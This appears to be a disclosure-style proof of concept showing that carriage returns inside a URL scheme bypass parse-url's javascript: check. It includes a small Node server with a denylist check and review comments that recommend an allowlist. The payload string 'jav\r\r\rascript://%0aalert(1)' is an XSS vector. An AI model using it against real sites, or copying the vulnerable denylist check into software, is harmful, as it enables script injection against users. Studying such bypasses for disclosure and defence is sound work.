The last fix can be bypassed because, in this line, we should also consider the case \r\r
or even \r.
const http = require("http");
const parseUrl = require("parse-url");
// Reproduction input from the report: carriage returns sit inside the scheme,
// so an exact string comparison against "javascript" does not match it.
// Browsers drop tab, CR and LF characters from a URL before parsing it (WHATWG
// URL Standard), so whatever consumes the rendered link can still resolve the
// value to a javascript: scheme even though the server-side check passed.
const url = parseUrl('jav\r\r\rascript://%0aalert(1)');

// Dump the parsed object so the fields the library actually returns are visible.
console.log(url);

const server = http.createServer((request, response) => {
  response.writeHead(200);

  // Denylist check under test: only the exact scheme "javascript" and null are
  // refused. Rejecting known-bad schemes is fragile; for link targets the
  // robust pattern is an allowlist (accept only e.g. http/https) applied to
  // the normalised URL.
  // NOTE(review): whether the parsed object exposes a `scheme` field is not
  // visible here. If it is undefined, neither comparison matches and the
  // "accepted" branch below is taken for every input; confirm against the
  // console output above.
  const refused = url.scheme === "javascript" || url.scheme === null;
  if (refused) {
    response.end("Nooo!");
    return;
  }

  // NOTE(review): the anchor as shown carries no href value; presumably the
  // report placed the parsed URL there and it was lost in extraction. Confirm
  // against the original report.
  response.end("<a href>Wowww!</a>");
});

// Bind to loopback only and print the address the server ended up on.
// Port 80 usually needs elevated privileges on Unix-like systems.
server.listen(80, "127.0.0.1", () => {
  const bound = server.address();
  console.log("http://" + bound.address + ":" + bound.port);
});